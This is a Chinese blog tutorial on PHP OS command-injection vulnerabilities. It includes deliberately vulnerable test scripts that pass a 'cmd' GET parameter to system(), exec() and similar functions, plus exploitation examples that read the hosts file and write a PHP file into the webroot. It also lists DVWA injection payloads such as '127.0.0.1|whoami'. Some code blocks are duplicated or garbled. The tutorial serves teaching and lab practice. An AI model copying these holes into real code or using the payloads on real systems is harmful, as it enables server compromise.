2022渗透测试-命令执行漏洞的详细讲解

已于 2022-02-25 20:25:42 修改
阅读量626 收藏 7
点赞数 3
文章标签: 渗透测试 网络安全
于 2021-12-29 15:40:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38612882/article/details/122217457
版权

命令执行

原理以及成因

程序员使用脚本语言(比如PHP )开发应用程序过程中,脚本语言开发十分快速、简介,方便,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序(系统命令或者exe等可执行文件)。当应用需要调用一些外部程序时就会用到一些系统命令的函数。 ​ 应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下,就会造成命令执行漏洞 。 ​ 1. 用户输入作为拼接 ​ 2. 没有足够的过滤

漏洞危害

1. 继承Web 服务器程序权限(Web 用户权限),去执行系统命令
    2. 继承Web 服务器权限,读写文件
    3. 反弹Shell
    4. 控制整个网站
    5. 控制整个服务器

相关函数

  • system()

    system() 能够将字符串作为OS 命令执行,自带输出功能。测试代码如下

<?php
header("Content-type: text/html; charset=gb2312");
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
}else{
    echo"
    ?cmd=ipconfig
    ";
}
?>

  • exec()

    exec() 函数能将字符串作为OS 命令执行,需要输出执行结果。测试代码如下 ----exec.php

    <?php
<meta charset="gb2312">
<?php
if(isset($_GET['cmd'])){
    echo "<pre>";
    print exec($_GET['cmd']);
}else{
    echo"
    ?cmd=whoami
    ";
}
?>

<meta charset="gb2312"> <?php if(isset($_GET['cmd'])){ echo "<pre>"; print exec($_GET['cmd']); }else{ echo" ?cmd=whoami "; } ?> ---- ### shell_exec() 测试代码如下

 <?php
 echo "<pre>";
 header("Content-type: text/html; charset=gb2312");
if(isset($_GET['cmd'])){
    print shell_exec($_GET['cmd']);
}else{
    echo"?cmd=whoami";
}
?>

image-20211229141607338

  • passthru()

    测试代码如下 ----passthru.php

    <?php
if(isset($_GET['cmd'])){
passthru($_GET['cmd']);
}else{
echo"?cmd=whoami";
}
?>

  • popen()

    popen() 也能够执行OS 命令,但是该函数并回是返回命令结果,而是返回一个文件指针。无论返回什么,我们关心的是命令执行了。 测试代码如下 ----popen.php

<?php
if(isset($_GET['cmd'])){
$cmd=$_GET['cmd'].">> 1.txt";
popen($cmd,'r');
}else{
echo"?cmd=whoami";
}
?>
查看1.txt 文件

image-20211229142108716

image-20211229142126688

  • 反引号

    反引号[``] 内的字符串,也会被解析成OS 命令。 测试代码如下

<?php
if(isset($_GET['cmd'])){
    $cmd=$_GET['cmd'];
    print `$cmd`;
}else{
    echo"?cmd=whoami";
}
?>

漏洞利用

OS 命令注入漏洞,攻击者直接继承Web 用户权限,在服务器上执行任意命令,危害特别大。以下命令均在windows 系统下测试成功。

  • 查看系统文件 提交参数[?cmd=type c:\windows\system32\drivers\etc\hosts],查看系统hosts 文件。

    image-20211229142820316

  • 显示当前路径 提交参数[?cmd=cd]

    image-20211229142844829

  • 写文件

    提交参数
[?cmd=echo "<?php phpinfo();?>" > D:\ruanjian\phpstudy\phpstudy_pro\WWW\minlingzhuru]页面没有报错,说明文件写入成功。访问shell.php 文件。

    提交参数[?cmd=echo "<?php phpinfo();?>" > D:\ruanjian\phpstudy\phpstudy_pro\WWW\minlingzhuru]

    页面没有报错,说明文件写入成功。访问shell.php 文件。

防御方法

1. 尽量减少命令执行函数的使用,并在disable_functions 中禁用 ​ 2. 在进入命令执行的函数或方法之前,对参数进行过滤 ​ 3. 参数的值尽量使用引号包裹,并在拼接前调用addslashes 进行转义 ​

DVWA 命令注入

low 127.0.0.1| whoami 127.0.0.1|whoami 127.0.0.1&&whoami 127.0.0.1;whoami ? 127.0.0.0.1||whoami medium 127.0.0.1| whoami 127.0.0.1|whoami 127.0.0.0.1||whoami 127.0.0.1&&&&whoami x

high

保持微笑-泽
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
OS命令注入知识点总结
千寻的博客
02-09 1164
文章目录第一章 原理以及成因第二章·漏洞危害第三章 相关函数第一节 system()第二节 exec()第三节 shell_exec()第四节 passthru()第五节 popen()第六节 反引号第四章 漏洞利用第一节 查看系统文件第二节 显示当前路径第三节写文件第五章 防御方法第六章 DVWA第一节 low命令注入第二节 medium命令注入 第一章 原理以及成因 程序员使用脚本语言(比...
计算机网络安全基础知识4:命令执行漏洞,危害极大,DVWA演示命令注入漏洞攻击网站,防御命令注入执行漏洞,low,medium,high,impossible
weixin_46838716的博客
03-03 1135
计算机网络安全基础知识4:命令执行漏洞,危害极大,DVWA演示命令注入漏洞攻击网站,防御命令注入执行漏洞,low,medium,high,impossible
渗透测试-一文了解命令执行漏洞和代码执行漏洞
最新发布
lza20001103的博客
04-23 1314
渗透测试-一文了解命令执行漏洞和代码执行漏洞
命令执行漏洞
qq_58000413的博客
10-15 943
2、反弹shell [把自己的cmd操作权限给别人]别人可以远程控制你的cmd/bash。自动输出、且多行执行【&url编码%26】,传参的时候传入的数据是否会被曲解。在php中是shell_exec的简写,手动输出echo(`whoami`)命令执行:用户输入的数据当做系统命令执行[cmd命令 shell/bash命令]代码执行的时候可以通过调用命令执行的函数来达到命令执行的效果。命令执行也可以写文件得到一句话木马,来达到代码执行的效果。手动输出,需要echo输出,只能输出单行。
命令执行漏洞详解
m0_55854679的博客
06-09 1260
文章目录漏洞原理 漏洞原理 用户输入的数据被当做系统命令进行执行。 代码执行:用户输入的数据当作后端代码执行 命令执行:用户输入的数据当作系统命令执行 <?php system('whoami')?> 其实一句话木马的本质就是一个命令执行漏洞。 .........
【Web漏洞探索】命令注入漏洞
kjcxmx的博客
09-21 6570
命令注入(又叫操作系统命令注入,也称为shell注入)是指在某种开发需求中,需要引入对系统本地命令的支持来完成某些特定的功能。当未对可控输入的参数进行严格的过滤时,则有可能发生命令注入。攻击者可以使用命令注入来执行系统终端命令,直接接管服务器的控制权限。它允许攻击者在运行应用程序的服务器上执行任意操作系统命令,并且通常会完全破坏应用程序及其所有数据。
Metasploit渗透测试指南 修订版
09-21
接下来,书中的重点会放在exploit的使用上,讲解如何利用Metasploit框架执行各种类型的攻击,如缓冲区溢出、SQL注入和远程命令执行等。此外,还会介绍payload的选择和定制,以及如何实现持久化访问,如创建后门。 ...
E083-Python安全渗透测试-UDP FLOOD网络渗透测试.pdf
12-02
【Python安全渗透测试-UDP FLOOD网络渗透测试】是一个关于网络安全漏洞利用的课程,主要讲解如何使用Python语言实施UDP洪水攻击(UDP FLOOD),这是一种常见的DDoS(分布式拒绝服务)攻击方式。以下是对该主题的...
同济大学渗透测试报告讲解.pdf
07-14
- 在报告中没有详细列出漏洞利用的过程,但在实际渗透测试中,可能包括SQL注入、跨站脚本(XSS)、文件包含漏洞等的测试。 7. **防护策略建议**: - 更新服务器软件,尤其是Web服务器和应用,以修复已知的安全...
php代码审计-代码执行.pdf
12-14
下面我们将对这些方式进行详细讲解和分析。 一、 eval() 函数 eval() 函数是 PHP 中的一种语言构造器,用于将字符串作为 PHP 代码执行。该函数可以作为回调函数使用,但需要一定的格式,否则将无法执行。 eval()...
#资源分享达人# 《Python渗透测试编程技术 方法与实践》_李华峰.zip
08-03
3. **漏洞利用**:书中可能详细讲解常见的安全漏洞类型,如SQL注入、XSS攻击、命令注入等,并演示如何编写Python脚本来发现和利用这些漏洞。 4. **Web应用渗透**:针对Web应用的渗透测试渗透测试中的重要部分。书...
命令执行漏洞原理和测试
LAngle9的博客
03-24 1049
PHP:system、exec、shell_exec、passthru、popen、proc_popen等称为高危漏洞。 原理:只要程序可以调用系统命令的情况下都可以发生命令执行漏洞。 条件:用户能够控制函数输入,存在可以执行代码的危险函数。 命令执行漏洞产生原因: 开发人员没有对特殊函数入口做过滤,导致用户可以提交恶意代码并提交服务端执行。 Web服务器没有过滤危险函数导致命令执行漏洞攻击成功。 命令执行漏洞带来的危害: 继承Web服务程序的权限去执行系统命令或读写文件。 反...
检测和利用命令注入漏洞
m0_71948933的博客
06-21 397
返回一个完整路径的文件列表,有不止一个版本的 NetCat,它是用来生成连接的工具。|:代表首先执行a命令,在执行b命令,不管a命令成功与否,都会去执行b命令。(当命令a失败时,它仍然会执行命令b,表示A命令语句的输出,作为B命令语句的输入执行。&:代表首先执行命令a再执行命令b,不管a是否成功,都会执行命令b。||:代表首先执行a命令执行b命令,只有a命令执行不成功,才会执行b命令。&&:代表首先执行命令a,若成功再执行命令b,又被称为短路运算符。可以看到通过whoami获取到了当前用户。
漏洞复现】JDWP远程命令执行漏洞
weixin_43486390的博客
03-02 6099
0x01 漏洞描述 JPDA(Java Platform Debugger Architecture):即Java平台调试体系架构。Java虚拟机设计的专门的API接口供调试和监控虚拟机使用 JPDA按照抽象层次,又分为三层,分别是: JVM TI(Java VM Tool Interface):虚拟机对外暴露的接口,包括debug和profile。 JDI(Java Debug Interface):Java库接口,实现了JDWP协议的客户端,调试器可以用来和远程被调试应用通信。 JDWP(Java
web渗透测试----9、命令执行漏洞
七天
01-18 1738
文章目录一、简介二、举例说明三、PHP命令执行实例一:命令执行实例二:代码执行实例三:动态函数调用实例四:PHP函数代码执行漏洞四、Java命令执行五、常见注入方式六、常见无回显的利用方式6.1、使用时间延迟检测无回显命令注入6.2、通过重定向输出来进行无回显命令注入6.3、利用带外通道技术(OOB)6.4、bash反弹shell七、防御附件:一些常见语言的危险函数 一、简介 命令注入漏洞通常是通过注入恶意的命令参数,拼接原本正常的命令语句,达到执行恶意命令目的的一类漏洞。 系统命令是可以连接执行的,在没
渗透测试与应急响应常用CMD命令
redwand的博客
12-10 1147
在web渗透测试过程中,当我们通过某个漏洞利用成功获取到webshell后,下一步便要通过webshell进行提权或打包数据。由于webshell对远程服务器的操控,是通过命令行而非图形化界面实现的,因此,渗透过程中熟悉常用的命令十分有必要,本文总结了一些渗透测试时常用的CMD命令
Introdução ao Mitre Att_ck e ao Cyber Kill Chain.pdf
10-06
课程重点讲解了如何实施渗透测试,包括突破网络外围(Cracking the Perimeter)或“桥梁”(Cracking The Bridge),即如何测试系统的防御能力,寻找漏洞和弱点。这涉及到实际的技能应用,如利用Python和Shell脚本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

保持微笑-泽

谢谢鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值